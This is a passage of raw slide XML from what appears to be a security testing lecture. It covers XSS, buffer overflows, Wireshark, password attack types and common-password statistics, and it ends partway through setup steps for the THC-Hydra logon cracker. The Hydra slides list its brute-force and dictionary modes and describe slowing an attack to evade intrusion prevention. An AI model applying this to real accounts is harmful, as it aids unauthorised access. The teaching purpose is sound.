            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Performing actions on behalf of other users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Redirecting to other websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Showing ads in hidden IFRAMES and pop-ups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p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72821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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistent XSS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The malicious string originates from the website's database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The malicious string originates from the victim's request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOM-based XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The vulnerability is in the client-side code rather than the server-side code.</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2941893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418" y="4257963"/>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a:t>XSS – Cross-site Scripting</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1030" name="Picture 6" descr="http://msmvps.com/cfs-file.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/alunj.metablogapi/2146.image_5F00_thumb_5F00_1F1803B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1800946"/>
            <a:ext cx="3409950" cy="1809751"/>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589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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate all input data from the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Never show data entered by the user without cleaning them from JavaScript and HTML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052" name="Picture 4" descr="http://www.frameloss.org/wp-content/uploads/2008/08/noscrip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55077" y="3553691"/>
            <a:ext cx="1600200" cy="1600202"/>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37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Acunetix Vulnerability Scanner</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Acunetix WVS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.acunetix.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>checks your web applications for XSS, SQL Injection &amp; other vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free demo version with limited functionality available (no details, reports or saved results)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1433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22091" y="3844046"/>
            <a:ext cx="3810000" cy="286155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377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62182" y="4368799"/>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4800" dirty="0" err="1"/>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t> Vulnerability Scanner</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508" b="100000" l="0" r="100000">
                        <a14:foregroundMark x1="45703" y1="66497" x2="45703" y2="66497"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="1835005"/>
            <a:ext cx="2438400" cy="1876425"/>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50234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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is buffer overflow?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>buffer overrun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7172" name="Picture 4" descr="http://www.tectonic.co.za/wordpress/wp-content/uploads/2009/03/bufferoverflow.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2300" y="4191000"/>
            <a:ext cx="2819400" cy="197358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318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Buffer Overflow - The Usual Victims</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="8686800" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer overflow is commonly associated with C and C++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide no built-in protection against accessing or overwriting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614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3704823"/>
            <a:ext cx="3048000" cy="2438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0" b="100000" l="0" r="98077"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3771900" y="3594099"/>
            <a:ext cx="4953000" cy="2679701"/>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3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182" y="5224249"/>
            <a:ext cx="7667625" cy="7530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886200" y="914400"/>
            <a:ext cx="48006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a:t>DEMO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11269" name="Picture 5" descr="Fiddl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09894">
            <a:off x="457200" y="2514600"/>
            <a:ext cx="5920048" cy="1795249"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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63529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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is security testing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directed and focused form of testing that attempts to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>force specific failures to occur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:tabLst>
                <a:tab pos="1654175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Focused especially on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>reliability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93143" y="3733800"/>
            <a:ext cx="2757714" cy="24964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215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2524125"/>
            <a:ext cx="4800600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wireshark</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0673" y="4043361"/>
            <a:ext cx="2857500" cy="1609725"/>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2665" y="4228303"/>
            <a:ext cx="4038008" cy="1239839"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2"/>
            </a:outerShdw>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870767" y="609600"/>
            <a:ext cx="1539433" cy="1431946"/>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474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Wireshark?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free and open-source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>packet analyzer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network troubleshooting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software and communications protocol development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.wireshark.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{58452FF4-89E3-4D1B-9927-2DBDC00E58D7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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91400" y="5181599"/>
            <a:ext cx="1190625"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649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3429000" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="2590800"/>
            <a:ext cx="2667000" cy="569120"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="http://www.amb-consulting.com/en/img/wireshark.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84225" y="865208"/>
            <a:ext cx="4038600" cy="307657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20187" y="3581400"/>
            <a:ext cx="3086100" cy="273512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105400" y="4648199"/>
            <a:ext cx="3086100" cy="98481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005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Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is a password attack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A type of software attack in which the attacker tries to guess passwords or crack encrypted password ﬁles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Either manually or through the use of scripts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57386" y="4343399"/>
            <a:ext cx="1629229" cy="1986865"/>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87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Password Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple guessing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dictionary attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using a list of popular passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Masquerading as a trustworthy entity </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brute force attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generating all possible combinations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329140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Most Frequently Used Passwords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027" name="Picture 3"/>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985" y="1446183"/>
            <a:ext cx="9146985" cy="495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068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&amp; Passwords</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="762000"/>
            <a:ext cx="8686800" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>9.8% have the passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>password, 123456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>12345678;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>14% have a password from the top 10 passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>40% have a password from the top 100 passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>79% have a password from the top 500 passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>91% have a password from the top 1 000 passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>98.8% have a password from the top 10 000 passwords</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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Chart 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4191000"/>
          <a:ext cx="9144000" cy="266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9666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735945"/>
            <a:ext cx="4876800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>THC-Hydra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42255"/>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872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THC-Hydra?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is THC-Hydra?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A very fast network logon cracker which support many different services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free of charge for non-enterprise use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.thc.org/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886200"/>
            <a:ext cx="2590800" cy="25908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063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supported?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Currently this tool supports:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POP3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP-GET, HTTP-FORM-POST, HTTPS-GET…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firebird</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Subversion (SVN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Telnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And many more…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150495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Bug Hypothesis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where do bugs come from?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bugs arise from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>interactions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>between the software and its environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> during operation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is the software's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>operating environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The human user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The file system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other cohabitating and interoperating software</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 name="Picture 2" descr="http://bugshieldsbydino.com/Bug%20Drawn%20Pictures/bug%20alone.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72564" y="3726625"/>
            <a:ext cx="1431925" cy="1333501"/>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66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attacks?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What type of attacks can HYDRA-HTC do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parallel dictionary attacks (16 threads by default)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brute force/Hybrid attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Check for null, reversed, same as username passwords</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slow down the process of attack- prevent detection- IPS   (Intrusion   Prevention  System)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Parallel attack of different servers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2090977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install?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="787658"/>
            <a:ext cx="8686800" cy="5791200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download and install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CYGWIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux-like environment for Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go to the directory of hydra:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcAft>
